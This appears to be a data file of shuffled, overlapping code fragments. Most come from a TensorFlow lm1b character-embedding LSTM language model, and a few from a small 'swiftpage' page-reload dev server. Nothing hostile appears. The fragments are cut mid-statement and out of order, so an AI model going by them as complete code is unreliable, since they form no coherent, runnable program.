iframe.contentWindow.location.reload(true); //iframe.location.reload(true); } } }", "else { console.log('Commands file does not exist.'); } }); } function checkForCommands() {", "else: # empties commands commands = open(\".swiftpage_commands\",\"w\") commands.write(\"\") commands.close() time.sleep(0.6) def addons_loop(): global", "removes existing commands file os.remove(\".swiftpage_commands\") # creates dev_server.html dev_server_page = open(\"dev_server.html\",\"w\") dev_server_page.write(dev_page) dev_server_page.close()", "0px;'> <iframe src='./site/index.html' name='content_window' style='width: 100%; height: 100%; outline: none;' frameborder='0'></iframe> </body> </html>", "setInterval(checkForCommands, 30); </script> <body style='padding: 0px; margin: 0px;'> <iframe src='./site/index.html' name='content_window' style='width: 100%;", "been updated modified_time = os.path.getmtime(\"page.py\") # if necessary, saves new copy of swiftpage", "of swiftpage if last_modified_time != modified_time: last_modified_time = modified_time os.system('python create_page.py') print(\"Page modified,", "refreshes web browser and writes other commands commands = open(\".swiftpage_commands\",\"w\") commands.write(str(last_modified_time)) commands.close() else:" ]
[ "* hparams.sequence_length, 1024), initializer=tf.zeros_initializer, trainable=False) out_0, state_0 = cell(input, tf.nn.rnn_cell.LSTMStateTuple(state_c, state_h)) ass_c =", "num_proj=hparams.word_embedding_size, num_unit_shards=NUM_SHARDS, num_proj_shards=NUM_SHARDS, forget_bias=1.0, use_peepholes=True) state_c = tf.get_variable(name=\"state_c\", shape=(hparams.batch_size * hparams.sequence_length, 8192), initializer=tf.zeros_initializer,", "hidden state # https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html cell = tf.contrib.rnn.LSTMCell(num_units=NUM_SHARDS * hparams.word_embedding_size, num_proj=hparams.word_embedding_size, num_unit_shards=NUM_SHARDS, num_proj_shards=NUM_SHARDS, forget_bias=1.0,", ":param hparams: :return: tensor shaped [?,vocab_size] \"\"\" softmax_w = create_sharded_weights((hparams.vocab_size / NUM_SHARDS, hparams.word_embedding_size),", "Helper to pull out the most likely words :param logits: :param id_to_word_lookup_table: :param", "= filter(lambda x: re.match(r_match, x.name), lstm_vars) for v in matching_variables: var_map[re.sub(r_match, r_replace, v.name)]", "the most likely words :param logits: :param id_to_word_lookup_table: :param k: :param hparams: :return:", "output and state \"\"\" # LSTM with cached / preserved hidden state #", "to trainer # todo: add GPU support to trainer # todo: reset lstm", "nodes \"\"\" with tf.variable_scope(CHAR_EMBEDDING_SCOPE): word_embeddings = char_embedding_nodes.attach_char_embedding_nodes(input_seqs, num_shards=NUM_SHARDS, hparams=hparams) word_embeddings = tf.reshape(word_embeddings, (-1,", "global_step = tf.Variable(0, name='global_step', trainable=False) train_op = optimizer.apply_gradients(zip(all_gradients, trainable_vars), global_step=global_step) return {\"train_op\": train_op,", "state_0[1]) with tf.control_dependencies([ass_c, ass_h]): out_0 = tf.identity(out_0) return out_0, state_0 def _attach_projection_nodes(input, hparams=None):", "\"\"\" Predict next word for each sequence / timestep in input_seqs :param input_seqs:", "inconsistencies import tensorflow as tf import re import os import lm1b.model.char_embedding_nodes as char_embedding_nodes", "the current graph :param sess: :param run_config: :return: \"\"\" def create_lm1b_restoration_var_map(char_embedding_vars, lstm_vars, softmax_vars):", "cached / preserved hidden state # https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html cell = tf.contrib.rnn.LSTMCell(num_units=NUM_SHARDS * hparams.word_embedding_size, num_proj=hparams.word_embedding_size,", ":return: \"\"\" target_list = tf.reshape(targets, [-1]) target_weights_list = tf.to_float(tf.reshape(target_weights, [-1])) # hrmm word_count", ":param hparams: :return: \"\"\" target_list = tf.reshape(targets, [-1]) target_weights_list = tf.to_float(tf.reshape(target_weights, [-1])) #", "\"\"\" top_k = tf.nn.top_k(logits, k) top_word_ids = top_k.indices word_predictions = tf.reshape(id_to_word_lookup_table.lookup(tf.to_int64(tf.reshape(top_word_ids, [-1]))), [-1,", "= tf.add(tf.reduce_sum(target_weights_list), 0.0000999999974738) cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=target_list) cross_entropy = tf.multiply(cross_entropy, tf.to_float(target_weights)) return {\"log_perplexity\":", "var_map_regexes.items(): matching_variables = filter(lambda x: re.match(r_match, x.name), lstm_vars) for v in matching_variables: var_map[re.sub(r_match,", "x.op.name.find(\"lstm\"), all_gradients) non_lstm_gradients = set(all_gradients).difference(lstm_gradients) lstm_gradients, global_norm = tf.clip_by_global_norm(lstm_gradients, hparams.lstm_clip_grad_norm) all_gradients = non_lstm_gradients.union(lstm_gradients)", "\"\\d)/lstm_cell/bias.*\": r\"\\1/B\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/w_([fio])_diag.*\": lambda match: match.group(1) + \"/W_\" +", "next word for each sequence / timestep in input_seqs :param input_seqs: tensor of", "var_map = {} # Map char embedding vars var_map = merge(var_map, dict(map(lambda x:", "data_format=\"NHWC\") softmax = tf.nn.softmax(logits) return logits, softmax def _attach_log_perplexity_nodes(logits, targets, target_weights, hparams=None): \"\"\"", "state for inference # todo: cleanup batch_sizing inconsistencies import tensorflow as tf import", "hparams.word_embedding_size), num_shards=NUM_SHARDS, concat_dim=1) softmax_w = tf.reshape(softmax_w, shape=(-1, hparams.word_embedding_size)) softmax_b = tf.get_variable('b', shape=(hparams.vocab_size)) logits", "= \"softmax\" def attach_inference_nodes(input_seqs, hparams=None): \"\"\" Predict next word for each sequence /", "shape=(hparams.batch_size * hparams.sequence_length, 1024), initializer=tf.zeros_initializer, trainable=False) out_0, state_0 = cell(input, tf.nn.rnn_cell.LSTMStateTuple(state_c, state_h)) ass_c", "tf.add(tf.reduce_sum(target_weights_list), 0.0000999999974738) cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=target_list) cross_entropy = tf.multiply(cross_entropy, tf.to_float(target_weights)) return {\"log_perplexity\": tf.reduce_sum(cross_entropy)", "\"softmax\": softmax, \"cell_state_all_layers\": cell_state_all_layers, \"cell_out_all_layers\": cell_out_all_layers } def attach_predicted_word_nodes(logits, id_to_word_lookup_table, k=5, hparams=None): \"\"\"", "optimizer.apply_gradients(zip(all_gradients, trainable_vars), global_step=global_step) return {\"train_op\": train_op, \"global_step\": global_step} def restore_original_lm1b(sess, run_config): \"\"\" Var", "trainable=False) state_h = tf.get_variable(name=\"state_h\", shape=(hparams.batch_size * hparams.sequence_length, 1024), initializer=tf.zeros_initializer, trainable=False) out_0, state_0 =", "[-1]))), [-1, k]) return {\"predicted_words\": word_predictions, \"top_k\": top_k} def attach_training_nodes(loss, hparams=None): \"\"\" Attach", "x), softmax_vars))) return var_map var_map = create_lm1b_restoration_var_map( char_embedding_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=CHAR_EMBEDDING_SCOPE), lstm_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=LSTM_SCOPE_PREFIX), softmax_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=SOFTMAX_SCOPE)", "\"_diag\", } for r_match, r_replace in var_map_regexes.items(): matching_variables = filter(lambda x: re.match(r_match, x.name),", "embedding vars var_map = merge(var_map, dict(map(lambda x: (x.op.name, x), char_embedding_vars))) # Map lstm", "_attach_log_perplexity_nodes(logits, targets, target_weights, hparams=None): \"\"\" :param logits: :param targets: :param target_weights: :param hparams:", "hparams=None): \"\"\" :param logits: :param targets: :param target_weights: :param hparams: :return: \"\"\" target_list", "+ \"/W_\" + match.group( 2).upper() + \"_diag\", } for r_match, r_replace in var_map_regexes.items():", "LSTM with cached / preserved hidden state # https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html cell = tf.contrib.rnn.LSTMCell(num_units=NUM_SHARDS *", "tf.nn.top_k(logits, k) top_word_ids = top_k.indices word_predictions = tf.reshape(id_to_word_lookup_table.lookup(tf.to_int64(tf.reshape(top_word_ids, [-1]))), [-1, k]) return {\"predicted_words\":", "for r_match, r_replace in var_map_regexes.items(): matching_variables = filter(lambda x: re.match(r_match, x.name), lstm_vars) for", "# todo: add dropout to trainer # todo: add GPU support to trainer", "tf.global_variables() all_gradients = tf.gradients(loss, trainable_vars) lstm_gradients = filter(lambda x: -1 < x.op.name.find(\"lstm\"), all_gradients)", "= {r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/projection/kernel/part_(\\d).*\": r\"\\1/W_P_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/kernel/part_(\\d).*\": r\"\\1/W_\\2\",", ":param k: :param hparams: :return: \"\"\" top_k = tf.nn.top_k(logits, k) top_word_ids = top_k.indices", "nodes for training. Work in progress... :param loss: :param hparams: :return: \"\"\" trainable_vars", "tf.multiply(cross_entropy, tf.to_float(target_weights)) return {\"log_perplexity\": tf.reduce_sum(cross_entropy) / word_count, \"cross_entropy\": cross_entropy} CHAR_EMBEDDING_SCOPE = \"char_embedding\" LSTM_SCOPE_PREFIX", "SOFTMAX_SCOPE = \"softmax\" def attach_inference_nodes(input_seqs, hparams=None): \"\"\" Predict next word for each sequence", "train_op, \"global_step\": global_step} def restore_original_lm1b(sess, run_config): \"\"\" Var mapping shenanigans to restore the", "merge(var_map, dict(map(lambda x: (x.op.name, x), char_embedding_vars))) # Map lstm embedding vars var_map_regexes =", "https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html cell = tf.contrib.rnn.LSTMCell(num_units=NUM_SHARDS * hparams.word_embedding_size, num_proj=hparams.word_embedding_size, num_unit_shards=NUM_SHARDS, num_proj_shards=NUM_SHARDS, forget_bias=1.0, use_peepholes=True) state_c =", "todo: add dropout to trainer # todo: add GPU support to trainer #", "https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html see: https://stackoverflow.com/questions/37969065/tensorflow-best-way-to-save-state-in-rnns :param input: tensor of word embeddings :param hparams: :return: lstm", "range(0, 2): with tf.variable_scope(LSTM_SCOPE_PREFIX + str(layer_num)): cell_out, cell_state = _attach_cached_lstm_nodes(cell_out, hparams=hparams) cell_state_all_layers.append(cell_state) cell_out_all_layers.append(cell_out)", "tf.get_variable(name=\"state_c\", shape=(hparams.batch_size * hparams.sequence_length, 8192), initializer=tf.zeros_initializer, trainable=False) state_h = tf.get_variable(name=\"state_h\", shape=(hparams.batch_size * hparams.sequence_length,", "lstm_gradients = filter(lambda x: -1 < x.op.name.find(\"lstm\"), all_gradients) non_lstm_gradients = set(all_gradients).difference(lstm_gradients) lstm_gradients, global_norm", "concat_dim=1) softmax_w = tf.reshape(softmax_w, shape=(-1, hparams.word_embedding_size)) softmax_b = tf.get_variable('b', shape=(hparams.vocab_size)) logits = tf.nn.bias_add(tf.matmul(input,", "cell_state_all_layers = [] cell_out_all_layers = [] for layer_num in range(0, 2): with tf.variable_scope(LSTM_SCOPE_PREFIX", "batch_sizing inconsistencies import tensorflow as tf import re import os import lm1b.model.char_embedding_nodes as", "0.0000999999974738) cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=target_list) cross_entropy = tf.multiply(cross_entropy, tf.to_float(target_weights)) return {\"log_perplexity\": tf.reduce_sum(cross_entropy) /", "hparams.word_embedding_size)) with tf.variable_scope(SOFTMAX_SCOPE): logits, softmax = _attach_projection_nodes(lstm_outputs, hparams=hparams) return { \"word_embeddings\": word_embeddings, \"lstm_outputs\":", "train_op = optimizer.apply_gradients(zip(all_gradients, trainable_vars), global_step=global_step) return {\"train_op\": train_op, \"global_step\": global_step} def restore_original_lm1b(sess, run_config):", "cell_out_all_layers.append(cell_out) lstm_outputs = tf.reshape(cell_out, shape=(-1, hparams.word_embedding_size)) with tf.variable_scope(SOFTMAX_SCOPE): logits, softmax = _attach_projection_nodes(lstm_outputs, hparams=hparams)", "state_h)) ass_c = tf.assign(state_c, state_0[0]) ass_h = tf.assign(state_h, state_0[1]) with tf.control_dependencies([ass_c, ass_h]): out_0", "= tf.get_variable(name=\"state_c\", shape=(hparams.batch_size * hparams.sequence_length, 8192), initializer=tf.zeros_initializer, trainable=False) state_h = tf.get_variable(name=\"state_h\", shape=(hparams.batch_size *", "create_sharded_weights NUM_SHARDS = 8 def _attach_cached_lstm_nodes(input, hparams=None): \"\"\" LSTM with cached / preserved", "= tf.train.AdagradOptimizer(hparams.learning_rate) global_step = tf.Variable(0, name='global_step', trainable=False) train_op = optimizer.apply_gradients(zip(all_gradients, trainable_vars), global_step=global_step) return", "inference # todo: cleanup batch_sizing inconsistencies import tensorflow as tf import re import", "import tensorflow as tf import re import os import lm1b.model.char_embedding_nodes as char_embedding_nodes from", "softmax_vars))) return var_map var_map = create_lm1b_restoration_var_map( char_embedding_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=CHAR_EMBEDDING_SCOPE), lstm_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=LSTM_SCOPE_PREFIX), softmax_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=SOFTMAX_SCOPE) )", "lstm output and state \"\"\" # LSTM with cached / preserved hidden state", "input_seqs :param input_seqs: tensor of character encoded words :param hparams: :return: dict of", "in matching_variables: var_map[re.sub(r_match, r_replace, v.name)] = v # Map softmax embedding vars var_map", "{\"log_perplexity\": tf.reduce_sum(cross_entropy) / word_count, \"cross_entropy\": cross_entropy} CHAR_EMBEDDING_SCOPE = \"char_embedding\" LSTM_SCOPE_PREFIX = \"lstm/lstm_\" SOFTMAX_SCOPE", "tf.reshape(word_embeddings, (-1, hparams.word_embedding_size)) cell_out = word_embeddings cell_state_all_layers = [] cell_out_all_layers = [] for", "* hparams.word_embedding_size, num_proj=hparams.word_embedding_size, num_unit_shards=NUM_SHARDS, num_proj_shards=NUM_SHARDS, forget_bias=1.0, use_peepholes=True) state_c = tf.get_variable(name=\"state_c\", shape=(hparams.batch_size * hparams.sequence_length,", "inference nodes \"\"\" with tf.variable_scope(CHAR_EMBEDDING_SCOPE): word_embeddings = char_embedding_nodes.attach_char_embedding_nodes(input_seqs, num_shards=NUM_SHARDS, hparams=hparams) word_embeddings = tf.reshape(word_embeddings,", "targets, target_weights, hparams=None): \"\"\" :param logits: :param targets: :param target_weights: :param hparams: :return:", "= merge(var_map, dict(map(lambda x: (x.op.name, x), softmax_vars))) return var_map var_map = create_lm1b_restoration_var_map( char_embedding_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES,", "trainable_vars = tf.trainable_variables() tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope=\"\") tf.global_variables() all_gradients = tf.gradients(loss, trainable_vars) lstm_gradients = filter(lambda", "{\"train_op\": train_op, \"global_step\": global_step} def restore_original_lm1b(sess, run_config): \"\"\" Var mapping shenanigans to restore", "char_embedding_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=CHAR_EMBEDDING_SCOPE), lstm_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=LSTM_SCOPE_PREFIX), softmax_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=SOFTMAX_SCOPE) ) saver = tf.train.Saver(var_list=var_map) saver.restore(sess, os.path.join(run_config['model_dir_path_original'], \"ckpt-*\"))", "tf.nn.rnn_cell.LSTMStateTuple(state_c, state_h)) ass_c = tf.assign(state_c, state_0[0]) ass_h = tf.assign(state_h, state_0[1]) with tf.control_dependencies([ass_c, ass_h]):", "\"\\d)/lstm_cell/projection/kernel/part_(\\d).*\": r\"\\1/W_P_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/kernel/part_(\\d).*\": r\"\\1/W_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/bias.*\":", "= tf.nn.top_k(logits, k) top_word_ids = top_k.indices word_predictions = tf.reshape(id_to_word_lookup_table.lookup(tf.to_int64(tf.reshape(top_word_ids, [-1]))), [-1, k]) return", "k=5, hparams=None): \"\"\" Helper to pull out the most likely words :param logits:", "+ LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/w_([fio])_diag.*\": lambda match: match.group(1) + \"/W_\" + match.group( 2).upper() +", "each sequence / timestep in input_seqs :param input_seqs: tensor of character encoded words", "lstm embedding vars var_map_regexes = {r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/projection/kernel/part_(\\d).*\": r\"\\1/W_P_\\2\", r\"^(\" +", "as char_embedding_nodes from lm1b.utils.util import merge from lm1b.utils.model import sharded_linear, create_sharded_weights NUM_SHARDS =", "tf.variable_scope(LSTM_SCOPE_PREFIX + str(layer_num)): cell_out, cell_state = _attach_cached_lstm_nodes(cell_out, hparams=hparams) cell_state_all_layers.append(cell_state) cell_out_all_layers.append(cell_out) lstm_outputs = tf.reshape(cell_out,", "sequence / timestep in input_seqs :param input_seqs: tensor of character encoded words :param", "todo: add GPU support to trainer # todo: reset lstm hidden state for", "in progress... :param loss: :param hparams: :return: \"\"\" trainable_vars = tf.trainable_variables() tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope=\"\")", "add GPU support to trainer # todo: reset lstm hidden state for inference", "tf.reshape(cell_out, shape=(-1, hparams.word_embedding_size)) with tf.variable_scope(SOFTMAX_SCOPE): logits, softmax = _attach_projection_nodes(lstm_outputs, hparams=hparams) return { \"word_embeddings\":", ":param sess: :param run_config: :return: \"\"\" def create_lm1b_restoration_var_map(char_embedding_vars, lstm_vars, softmax_vars): var_map = {}", "shape=(-1, hparams.word_embedding_size)) softmax_b = tf.get_variable('b', shape=(hparams.vocab_size)) logits = tf.nn.bias_add(tf.matmul(input, softmax_w, transpose_b=True), softmax_b, data_format=\"NHWC\")", "top_word_ids = top_k.indices word_predictions = tf.reshape(id_to_word_lookup_table.lookup(tf.to_int64(tf.reshape(top_word_ids, [-1]))), [-1, k]) return {\"predicted_words\": word_predictions, \"top_k\":", "\"global_step\": global_step} def restore_original_lm1b(sess, run_config): \"\"\" Var mapping shenanigans to restore the pre-trained", "char_embedding_nodes from lm1b.utils.util import merge from lm1b.utils.model import sharded_linear, create_sharded_weights NUM_SHARDS = 8", "8 def _attach_cached_lstm_nodes(input, hparams=None): \"\"\" LSTM with cached / preserved hidden state see:", "lambda match: match.group(1) + \"/W_\" + match.group( 2).upper() + \"_diag\", } for r_match,", "to pull out the most likely words :param logits: :param id_to_word_lookup_table: :param k:", "lstm hidden state for inference # todo: cleanup batch_sizing inconsistencies import tensorflow as", "var_map_regexes = {r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/projection/kernel/part_(\\d).*\": r\"\\1/W_P_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/kernel/part_(\\d).*\":", "restore the pre-trained model to the current graph :param sess: :param run_config: :return:", "+ \"\\d)/lstm_cell/bias.*\": r\"\\1/B\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/w_([fio])_diag.*\": lambda match: match.group(1) + \"/W_\"", "[-1, k]) return {\"predicted_words\": word_predictions, \"top_k\": top_k} def attach_training_nodes(loss, hparams=None): \"\"\" Attach nodes", "tf.trainable_variables() tf.get_collection(tf.GraphKeys.MODEL_VARIABLES, scope=\"\") tf.global_variables() all_gradients = tf.gradients(loss, trainable_vars) lstm_gradients = filter(lambda x: -1", "\"\"\" Var mapping shenanigans to restore the pre-trained model to the current graph", "[-1]) target_weights_list = tf.to_float(tf.reshape(target_weights, [-1])) # hrmm word_count = tf.add(tf.reduce_sum(target_weights_list), 0.0000999999974738) cross_entropy =", "Map char embedding vars var_map = merge(var_map, dict(map(lambda x: (x.op.name, x), char_embedding_vars))) #", "x), char_embedding_vars))) # Map lstm embedding vars var_map_regexes = {r\"^(\" + LSTM_SCOPE_PREFIX +", "= tf.reshape(id_to_word_lookup_table.lookup(tf.to_int64(tf.reshape(top_word_ids, [-1]))), [-1, k]) return {\"predicted_words\": word_predictions, \"top_k\": top_k} def attach_training_nodes(loss, hparams=None):", "input: tensor of word embeddings :param hparams: :return: lstm output and state \"\"\"", "predictions :param input: lstm outputs :param hparams: :return: tensor shaped [?,vocab_size] \"\"\" softmax_w", "from lm1b.utils.model import sharded_linear, create_sharded_weights NUM_SHARDS = 8 def _attach_cached_lstm_nodes(input, hparams=None): \"\"\" LSTM", "with cached / preserved hidden state see: https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html see: https://stackoverflow.com/questions/37969065/tensorflow-best-way-to-save-state-in-rnns :param input: tensor", "tf.reshape(targets, [-1]) target_weights_list = tf.to_float(tf.reshape(target_weights, [-1])) # hrmm word_count = tf.add(tf.reduce_sum(target_weights_list), 0.0000999999974738) cross_entropy", "timestep in input_seqs :param input_seqs: tensor of character encoded words :param hparams: :return:", "add dropout to trainer # todo: add GPU support to trainer # todo:", "word embeddings :param hparams: :return: lstm output and state \"\"\" # LSTM with", "embeddings :param hparams: :return: lstm output and state \"\"\" # LSTM with cached", "targets: :param target_weights: :param hparams: :return: \"\"\" target_list = tf.reshape(targets, [-1]) target_weights_list =", "= tf.reshape(softmax_w, shape=(-1, hparams.word_embedding_size)) softmax_b = tf.get_variable('b', shape=(hparams.vocab_size)) logits = tf.nn.bias_add(tf.matmul(input, softmax_w, transpose_b=True),", "encoded words :param hparams: :return: dict of inference nodes \"\"\" with tf.variable_scope(CHAR_EMBEDDING_SCOPE): word_embeddings", "input_seqs: tensor of character encoded words :param hparams: :return: dict of inference nodes", "hparams: :return: tensor shaped [?,vocab_size] \"\"\" softmax_w = create_sharded_weights((hparams.vocab_size / NUM_SHARDS, hparams.word_embedding_size), num_shards=NUM_SHARDS,", "LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/kernel/part_(\\d).*\": r\"\\1/W_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/bias.*\": r\"\\1/B\", r\"^(\" + LSTM_SCOPE_PREFIX", "= tf.multiply(cross_entropy, tf.to_float(target_weights)) return {\"log_perplexity\": tf.reduce_sum(cross_entropy) / word_count, \"cross_entropy\": cross_entropy} CHAR_EMBEDDING_SCOPE = \"char_embedding\"", "= create_lm1b_restoration_var_map( char_embedding_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=CHAR_EMBEDDING_SCOPE), lstm_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=LSTM_SCOPE_PREFIX), softmax_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=SOFTMAX_SCOPE) ) saver = tf.train.Saver(var_list=var_map) saver.restore(sess,", "[-1])) # hrmm word_count = tf.add(tf.reduce_sum(target_weights_list), 0.0000999999974738) cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits, labels=target_list) cross_entropy =", ":return: tensor shaped [?,vocab_size] \"\"\" softmax_w = create_sharded_weights((hparams.vocab_size / NUM_SHARDS, hparams.word_embedding_size), num_shards=NUM_SHARDS, concat_dim=1)", "initializer=tf.zeros_initializer, trainable=False) out_0, state_0 = cell(input, tf.nn.rnn_cell.LSTMStateTuple(state_c, state_h)) ass_c = tf.assign(state_c, state_0[0]) ass_h", "\"cross_entropy\": cross_entropy} CHAR_EMBEDDING_SCOPE = \"char_embedding\" LSTM_SCOPE_PREFIX = \"lstm/lstm_\" SOFTMAX_SCOPE = \"softmax\" def attach_inference_nodes(input_seqs,", "for each sequence / timestep in input_seqs :param input_seqs: tensor of character encoded", "r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/bias.*\": r\"\\1/B\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/w_([fio])_diag.*\": lambda match:", "def _attach_log_perplexity_nodes(logits, targets, target_weights, hparams=None): \"\"\" :param logits: :param targets: :param target_weights: :param", "= tf.identity(out_0) return out_0, state_0 def _attach_projection_nodes(input, hparams=None): \"\"\" Project LSTM outputs to", "tensor shaped [?,vocab_size] \"\"\" softmax_w = create_sharded_weights((hparams.vocab_size / NUM_SHARDS, hparams.word_embedding_size), num_shards=NUM_SHARDS, concat_dim=1) softmax_w", "logits: :param id_to_word_lookup_table: :param k: :param hparams: :return: \"\"\" top_k = tf.nn.top_k(logits, k)", "non_lstm_gradients = set(all_gradients).difference(lstm_gradients) lstm_gradients, global_norm = tf.clip_by_global_norm(lstm_gradients, hparams.lstm_clip_grad_norm) all_gradients = non_lstm_gradients.union(lstm_gradients) optimizer =", "forget_bias=1.0, use_peepholes=True) state_c = tf.get_variable(name=\"state_c\", shape=(hparams.batch_size * hparams.sequence_length, 8192), initializer=tf.zeros_initializer, trainable=False) state_h =", "return var_map var_map = create_lm1b_restoration_var_map( char_embedding_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=CHAR_EMBEDDING_SCOPE), lstm_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=LSTM_SCOPE_PREFIX), softmax_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=SOFTMAX_SCOPE) ) saver", "+ LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/kernel/part_(\\d).*\": r\"\\1/W_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/bias.*\": r\"\\1/B\", r\"^(\" +", "for v in matching_variables: var_map[re.sub(r_match, r_replace, v.name)] = v # Map softmax embedding", "lstm_vars) for v in matching_variables: var_map[re.sub(r_match, r_replace, v.name)] = v # Map softmax", "shape=(hparams.vocab_size)) logits = tf.nn.bias_add(tf.matmul(input, softmax_w, transpose_b=True), softmax_b, data_format=\"NHWC\") softmax = tf.nn.softmax(logits) return logits,", "\"lstm_outputs\": lstm_outputs, \"lstm_state\": cell_state, \"logits\": logits, \"softmax\": softmax, \"cell_state_all_layers\": cell_state_all_layers, \"cell_out_all_layers\": cell_out_all_layers }", "tf.nn.softmax(logits) return logits, softmax def _attach_log_perplexity_nodes(logits, targets, target_weights, hparams=None): \"\"\" :param logits: :param", "preserved hidden state # https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html cell = tf.contrib.rnn.LSTMCell(num_units=NUM_SHARDS * hparams.word_embedding_size, num_proj=hparams.word_embedding_size, num_unit_shards=NUM_SHARDS, num_proj_shards=NUM_SHARDS,", "Predict next word for each sequence / timestep in input_seqs :param input_seqs: tensor", "and state \"\"\" # LSTM with cached / preserved hidden state # https://r2rt.com/non-zero-initial-states-for-recurrent-neural-networks.html", "num_proj_shards=NUM_SHARDS, forget_bias=1.0, use_peepholes=True) state_c = tf.get_variable(name=\"state_c\", shape=(hparams.batch_size * hparams.sequence_length, 8192), initializer=tf.zeros_initializer, trainable=False) state_h", "cell_out_all_layers } def attach_predicted_word_nodes(logits, id_to_word_lookup_table, k=5, hparams=None): \"\"\" Helper to pull out the", "filter(lambda x: -1 < x.op.name.find(\"lstm\"), all_gradients) non_lstm_gradients = set(all_gradients).difference(lstm_gradients) lstm_gradients, global_norm = tf.clip_by_global_norm(lstm_gradients,", "hparams=None): \"\"\" Project LSTM outputs to sparse vectors / word predictions :param input:", "lstm outputs :param hparams: :return: tensor shaped [?,vocab_size] \"\"\" softmax_w = create_sharded_weights((hparams.vocab_size /", "hparams: :return: dict of inference nodes \"\"\" with tf.variable_scope(CHAR_EMBEDDING_SCOPE): word_embeddings = char_embedding_nodes.attach_char_embedding_nodes(input_seqs, num_shards=NUM_SHARDS,", "dropout to trainer # todo: add GPU support to trainer # todo: reset", "r_replace in var_map_regexes.items(): matching_variables = filter(lambda x: re.match(r_match, x.name), lstm_vars) for v in", "\"top_k\": top_k} def attach_training_nodes(loss, hparams=None): \"\"\" Attach nodes for training. Work in progress...", "[?,vocab_size] \"\"\" softmax_w = create_sharded_weights((hparams.vocab_size / NUM_SHARDS, hparams.word_embedding_size), num_shards=NUM_SHARDS, concat_dim=1) softmax_w = tf.reshape(softmax_w,", "lm1b.model.char_embedding_nodes as char_embedding_nodes from lm1b.utils.util import merge from lm1b.utils.model import sharded_linear, create_sharded_weights NUM_SHARDS", "dict(map(lambda x: (x.op.name, x), softmax_vars))) return var_map var_map = create_lm1b_restoration_var_map( char_embedding_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=CHAR_EMBEDDING_SCOPE), lstm_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES,", ":param run_config: :return: \"\"\" def create_lm1b_restoration_var_map(char_embedding_vars, lstm_vars, softmax_vars): var_map = {} # Map", "state_0 def _attach_projection_nodes(input, hparams=None): \"\"\" Project LSTM outputs to sparse vectors / word", "embedding vars var_map_regexes = {r\"^(\" + LSTM_SCOPE_PREFIX + \"\\d)/lstm_cell/projection/kernel/part_(\\d).*\": r\"\\1/W_P_\\2\", r\"^(\" + LSTM_SCOPE_PREFIX", "var_map = merge(var_map, dict(map(lambda x: (x.op.name, x), softmax_vars))) return var_map var_map = create_lm1b_restoration_var_map(", "match: match.group(1) + \"/W_\" + match.group( 2).upper() + \"_diag\", } for r_match, r_replace", "set(all_gradients).difference(lstm_gradients) lstm_gradients, global_norm = tf.clip_by_global_norm(lstm_gradients, hparams.lstm_clip_grad_norm) all_gradients = non_lstm_gradients.union(lstm_gradients) optimizer = tf.train.AdagradOptimizer(hparams.learning_rate) global_step", "word_embeddings = tf.reshape(word_embeddings, (-1, hparams.word_embedding_size)) cell_out = word_embeddings cell_state_all_layers = [] cell_out_all_layers =", "create_lm1b_restoration_var_map( char_embedding_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=CHAR_EMBEDDING_SCOPE), lstm_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=LSTM_SCOPE_PREFIX), softmax_vars=tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES, scope=SOFTMAX_SCOPE) ) saver = 